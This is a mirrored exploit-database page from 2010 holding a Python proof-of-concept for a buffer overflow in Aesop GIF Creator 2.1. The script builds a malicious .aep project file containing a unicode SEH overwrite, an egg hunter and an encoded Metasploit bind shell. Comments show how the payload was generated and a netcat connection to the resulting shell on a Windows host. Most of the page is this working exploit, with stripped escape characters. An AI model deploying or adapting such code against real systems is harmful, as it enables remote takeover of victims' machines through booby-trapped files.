Home / os / win7

[local exploits] - Aesop GIF Creator <= v2.1 (.aep) Buffe

Posted on 16 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Aesop GIF Creator &lt;= v2.1 (.aep) Buffer Overflow Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Aesop GIF Creator &lt;= v2.1 (.aep) Buffer Overflow Exploit by xsploited security in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>========================================================
Aesop GIF Creator &lt;= v2.1 (.aep) Buffer Overflow Exploit
========================================================

# !/usr/bin/python
# Exploit Title: Aesop GIF Creator &lt;= v2.1 (.aep) Buffer Overflow Exploit
# Date: 12/15/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsec [at] x-sploited.com
# Software Link: http://www.yukudr.com/_h84561/aesop_setup.exe
# Vulnerable version: &lt;= v2.1
# Tested on: Windows XP SP3 Eng
# CVE : N/A
 
#### Software Description:
# Aesop is a powerful tool that allows you to create animated GIF images (banners, buttons, labels and headings)
# for your website and even GIF wallpapers for your mobile phone quickly and easily (click to see samples). You
# can use an antialiased 3D-Text, shapes (rectangles, rounded rectangles, ellipses and polygons) and external
# pictures for drawing in your GIF.
# Convenient interface.
# Unicode support - you can use national characters as Text in your GIF.
# An excellent antialiasing technique (blurring the edges between color transitions) to draw 3D-Text and shapes:
#### Exploit information:
# Aesop is prone to a buffer overflow when handling a malicious aesop project files. The vulnerability
# is due to improper bounds checking of the &quot;Picture=&quot; field which can be exploited by malicious people to
# compromise a users system.
#### Other information:
# I attempted to reach out to the vendor about this but after a few short emails it became clear that they
# had no interest in verifying it/coordinating a fix so here&#039;s the exploit.
#### Notes:
# I always knew that one day I would end up needing to deal with unicode buffers. After a couple nights of
# tinkering around this is the end result. P.S. - When all else fails-&gt;Fail harder
#### Shoutz:
# kAoTiX, Sheep, Tu, edb-team, corelan team, packetstormsecurity and all other security researchers and sites.
# -&gt; A big thanks goes to corelanc0d3r for shedding some light on the subject of unicode exploits. ;)
 
import struct
import sys
 
about = &quot;
==================================================================
&quot;
about +=  &quot; Title: Aesop GIF Creator &lt;= v2.1 (.aep) Buffer Overflow Exploit PoC
&quot;
about +=  &quot; Author: xsploitedsec
 URL: http://www.x-sploited.com/
&quot;
about +=  &quot; Contact: xsploitedsecurity [at] x-sploited.com
&quot;
about +=  &quot;==================================================================&quot;
print about
 
# root@bt:~# msfpayload windows/shell_bind_tcp lport=4444 lhost=0.0.0.0 EXITFUNC=seh R
# | msfencode -e x86/alpha_upper -c 1 -t c -b &#039;x1ax19x0a&#039; &gt; /tmp/aesop.txt
# [*] x86/alpha_upper succeeded with size 752 (iteration=1)
#
# root@bt:~# ncat 10.0.1.16 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# C:&gt;
 
# Unmolested, ASCII shellcode buried in stack ftw!?
bindshell = (
&quot;xdaxcaxd9x74x24xf4x58x50x59x49x49x49x43x43x43&quot;
&quot;x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41&quot;
&quot;x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42&quot;
&quot;x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50&quot;
&quot;x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30x43&quot;
&quot;x30x43x30x43x50x4dx59x4dx35x50x31x4ex32x42x44&quot;
&quot;x4cx4bx51x42x50x30x4cx4bx46x32x44x4cx4cx4bx50&quot;
&quot;x52x44x54x4cx4bx44x32x47x58x44x4fx48x37x50x4a&quot;
&quot;x47x56x50x31x4bx4fx46x51x4fx30x4ex4cx47x4cx45&quot;
&quot;x31x43x4cx44x42x46x4cx47x50x4fx31x48x4fx44x4d&quot;
&quot;x43x31x48x47x4dx32x4cx30x50x52x51x47x4cx4bx51&quot;
&quot;x42x42x30x4cx4bx47x32x47x4cx43x31x48x50x4cx4b&quot;
&quot;x47x30x44x38x4cx45x4fx30x43x44x50x4ax43x31x48&quot;
&quot;x50x46x30x4cx4bx51x58x44x58x4cx4bx51x48x51x30&quot;
&quot;x43x31x4ex33x4ax43x47x4cx47x39x4cx4bx50x34x4c&quot;
&quot;x4bx45x51x4ex36x46x51x4bx4fx46x51x49x50x4ex4c&quot;
&quot;x4fx31x48x4fx44x4dx43x31x48x47x50x38x4bx50x42&quot;
&quot;x55x4cx34x45x53x43x4dx4bx48x47x4bx43x4dx51x34&quot;
&quot;x42x55x4ax42x50x58x4cx4bx46x38x51x34x45x51x48&quot;
&quot;x53x45x36x4cx4bx44x4cx50x4bx4cx4bx50x58x45x4c&quot;
&quot;x43x31x4ex33x4cx4bx45x54x4cx4bx45x51x48x50x4c&quot;
&quot;x49x47x34x46x44x47x54x51x4bx51x4bx45x31x46x39&quot;
&quot;x51x4ax50x51x4bx4fx4bx50x51x48x51x4fx51x4ax4c&quot;
&quot;x4bx42x32x4ax4bx4cx46x51x4dx43x58x47x43x46x52&quot;
&quot;x45x50x45x50x45x38x43x47x44x33x47x42x51x4fx51&quot;
&quot;x44x43x58x50x4cx42x57x46x46x43x37x4bx4fx49x45&quot;
&quot;x4fx48x4ax30x43x31x43x30x45x50x51x39x49x54x51&quot;
&quot;x44x46x30x43x58x51x39x4bx30x42x4bx43x30x4bx4f&quot;
&quot;x4ex35x46x30x46x30x50x50x50x50x47x30x50x50x51&quot;
&quot;x50x50x50x45x38x4ax4ax44x4fx49x4fx4dx30x4bx4f&quot;
&quot;x4ex35x4bx39x48x47x46x51x49x4bx51x43x45x38x44&quot;
&quot;x42x45x50x42x31x51x4cx4bx39x4bx56x42x4ax44x50&quot;
&quot;x51x46x46x37x45x38x49x52x49x4bx50x37x45x37x4b&quot;
&quot;x4fx4ex35x46x33x51x47x43x58x48x37x4ax49x47x48&quot;
&quot;x4bx4fx4bx4fx4ex35x50x53x46x33x46x37x42x48x43&quot;
&quot;x44x4ax4cx47x4bx4dx31x4bx4fx4ex35x50x57x4bx39&quot;
&quot;x49x57x42x48x44x35x42x4ex50x4dx45x31x4bx4fx49&quot;
&quot;x45x45x38x43x53x42x4dx45x34x43x30x4cx49x4bx53&quot;
&quot;x50x57x50x57x51x47x46x51x4ax56x43x5ax45x42x50&quot;
&quot;x59x50x56x4dx32x4bx4dx43x56x48x47x51x54x47x54&quot;
&quot;x47x4cx43x31x43x31x4cx4dx51x54x51x34x44x50x4f&quot;
&quot;x36x43x30x51x54x50x54x46x30x46x36x46x36x46x36&quot;
&quot;x51x56x50x56x50x4ex50x56x50x56x50x53x46x36x43&quot;
&quot;x58x44x39x48x4cx47x4fx4dx56x4bx4fx49x45x4cx49&quot;
&quot;x4dx30x50x4ex46x36x47x36x4bx4fx46x50x42x48x43&quot;
&quot;x38x4bx37x45x4dx43x50x4bx4fx48x55x4fx4bx4bx4e&quot;
&quot;x44x4ex46x52x4bx5ax43x58x4ex46x4cx55x4fx4dx4d&quot;
&quot;x4dx4bx4fx48x55x47x4cx45x56x43x4cx45x5ax4bx30&quot;
&quot;x4bx4bx4dx30x43x45x43x35x4fx4bx47x37x45x43x43&quot;
&quot;x42x42x4fx42x4ax43x30x51x43x4bx4fx4ex35x45x5a&quot;
&quot;x41x41&quot;
);
 
# unicode encoded, egg=&quot;w00t&quot;
egg_hunter = (
&quot;PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ&quot;
&quot;1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AY&quot;
&quot;AZBABABABAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ44J&quot;
&quot;O7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA&quot;
);
 
# aesop project file header
prj_header = (
&quot;x5Bx41x65x73x6Fx70x20x50x72x6Fx6Ax65x63x74x20x46x69x6C&quot;
&quot;x65x20x76x2Ex32x2Ex30x5Dx0Dx0Ax7Bx50x69x63x74x75x72x65&quot;
&quot;x3D&quot;
);
 
#hunter tag =&quot;w00tw00t&quot;
egg = &quot;x77x30x30x74x77x30x30x74&quot;;
seh_offset = 669;
 
# Begin payload buffer
payload = &quot;x41&quot; * seh_offset;
# NSEH
payload += &quot;x61&quot;;                        #popad
payload += &quot;x73&quot;;                        #nopalign/add byte ptr [ebx],dh
# SE handler
payload += &quot;xB1x42&quot;;                    #unicode compatible p/p/r - Aesop.exe (universal)
# Prepare/jump-&gt;EAX
payload += &quot;x73&quot;;                        #venetian/add byte ptr [ebx],dh
payload += &quot;x55&quot;;                        #push ebp
payload += &quot;x73&quot;;                        #venetian/add byte ptr [ebx],dh
payload += &quot;x58&quot;;                        #pop eax
payload += &quot;x73&quot;;                        #venetian/add byte ptr [ebx],dh
payload += &quot;x05x19x11&quot;;                #add eax, 0x19002200h
payload += &quot;x73&quot;;                        #venetian/add byte ptr [ebx],dh
payload += &quot;x2dx11x11&quot;;                #sub eax, 0x12007200h
payload += &quot;x73&quot;;                        #venetian/add byte ptr [ebx],dh
payload += &quot;x50&quot;;                        #push eax
payload += &quot;x73&quot;;                        #add byte ptr [ebx],dh
payload += &quot;xc3&quot;;                        #ret
 
payload += &quot;x41&quot; * 242;                  #align egghunter with-&gt;(ebp+650)
payload += egg_hunter;
payload += &quot;x41&quot; * 1000;                 #give shellcode some breathing room
 
payload += egg;
payload += bindshell;
 
payload += &quot;x44&quot; * (5000-len(payload)); #junk padding
# End payload buffer
 
xsploitme = (prj_header + payload);
print(&quot;
[*] Creating file-&gt;xsploited.aep&quot;);
 
try:
    out_file = open(&quot;xsploited.aep&quot;,&#039;w&#039;);
    out_file.write(xsploitme);
    out_file.close();
    print(&quot;[+] xsploited.aep created successfully&quot;);
    print(&quot;[*] 1. Launch the file or open it via Aesop.exe&quot;);
    print(&quot;[*] 2. Wait a sec for egghunter and netcat in :)
[-] Exiting...
&quot;);
except (IOError):
    print(&quot;[!] Error creating file
[-] Exiting...
&quot;);


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-16]</pre></body></html>

 

TOP